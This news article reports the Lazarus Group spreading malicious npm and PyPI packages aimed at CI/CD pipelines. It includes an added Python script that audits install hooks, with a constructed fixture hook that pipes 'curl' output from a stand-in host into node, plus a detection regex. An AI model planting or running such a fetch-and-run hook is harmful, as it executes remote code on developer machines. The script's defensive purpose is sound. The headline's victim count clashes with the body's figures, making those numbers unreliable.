
Malicious Open Source Packages Linked to Lazarus Cyber Spies Affect Over 200 Users

North Korean hackers Lazarus Group accused of cyber-spying, employing publicly accessible software packages in their operations


In the first half of 2025, the security vendor Sonatype blocked 234 unique malware packages across npm and PyPI. These packages, attributed to the notorious Lazarus Group, are believed to have reached as many as 36,000 victims.

The Lazarus Group, known for its state-sponsored cyber-attacks, has reportedly shifted its strategy, focusing on open-source packages popular in DevOps-heavy organisations or teams with automated Continuous Integration/Continuous Deployment (CI/CD) pipelines.

Once installed, these malicious packages typically execute a multi-stage attack designed to maintain stealth, achieve persistence, and exfiltrate sensitive data. The targets of the Lazarus Group's campaign included build pipelines, developer machines, and cloud-based deployments.
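The article does not describe how the packages run once installed, but the usual entry point for an npm package into a build pipeline is its install-time lifecycle hook. The following audit script is an added example, not Sonatype's tooling or code from the report; it walks a `node_modules` tree, lists every package that declares a `preinstall`, `install`, `postinstall` or `prepare` hook, and marks hooks whose command looks like it fetches or evaluates remote code. The package names and hook commands in `demo()` are constructed for illustration.

```python
"""Audit an npm dependency tree for packages that run code at install time.

Constructed example: builds a throwaway node_modules tree, then flags every
package whose package.json declares a lifecycle hook and marks hooks that
appear to download or evaluate code from the network.
"""
import json
import os
import re
import tempfile

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Heuristic for hooks that pull and run remote content (constructed word list).
SUSPICIOUS = re.compile(r"\b(curl|wget|node\s+-e|powershell|base64|eval)\b", re.I)


def audit_node_modules(root):
    """Return sorted (package, hook, command, suspicious) tuples for every install hook."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                pkg = json.load(fh)
            except ValueError:
                continue  # malformed manifest: skip it rather than abort the audit
        scripts = pkg.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            cmd = scripts.get(hook)
            if cmd:
                name = pkg.get("name", dirpath)
                findings.append((name, hook, cmd, bool(SUSPICIOUS.search(cmd))))
    return sorted(findings)


def _write_pkg(root, name, scripts=None):
    """Create a minimal package.json under node_modules (scoped names become subdirs)."""
    pkg_dir = os.path.join(root, "node_modules", *name.split("/"))
    os.makedirs(pkg_dir, exist_ok=True)
    with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": name, "version": "1.0.0", "scripts": scripts or {}}, fh)


def demo():
    """Constructed tree: one clean package, one native build step, one fetch-and-run hook."""
    root = tempfile.mkdtemp()
    _write_pkg(root, "left-pad-ish")
    _write_pkg(root, "native-addon", {"install": "node-gyp rebuild"})
    _write_pkg(root, "@scope/typo-squat", {"postinstall": "curl -s http://example.invalid/s | node"})
    return audit_node_modules(root)


if __name__ == "__main__":
    for name, hook, cmd, bad in demo():
        print(("SUSPICIOUS " if bad else "review     ") + f"{name}: {hook} -> {cmd}")
```

In a CI agent the cheaper control is to disable hooks outright with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) and allow-list the few packages, such as native add-ons, that genuinely need them.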

The malicious packages were often disguised as legitimate development libraries, so they could be installed without arousing suspicion. North Korean threat actors are said to have distributed over 200 such packages.

Of the 234 malicious packages detected, 120 were droppers designed to deliver additional malware, while 90 were built for secrets exfiltration. The spread of these packages is thought to be the result of attackers exploiting software supply chain weaknesses, notably through techniques such as DLL side-loading, which allow malicious code to be injected and executed under the attacker's control.

The compromise of a single developer machine or build agent could lead to intellectual property theft, injection of backdoors into production software, lateral movement across the corporate network, and significant reputational damage.

The report attributed the operation to the Lazarus Group based on command-and-control (C2) infrastructure, payload behavior, and campaign timing similar to previous campaigns associated with the group. This incident underscores the need for vigilance in the face of evolving cyber threats and the importance of secure software development practices.
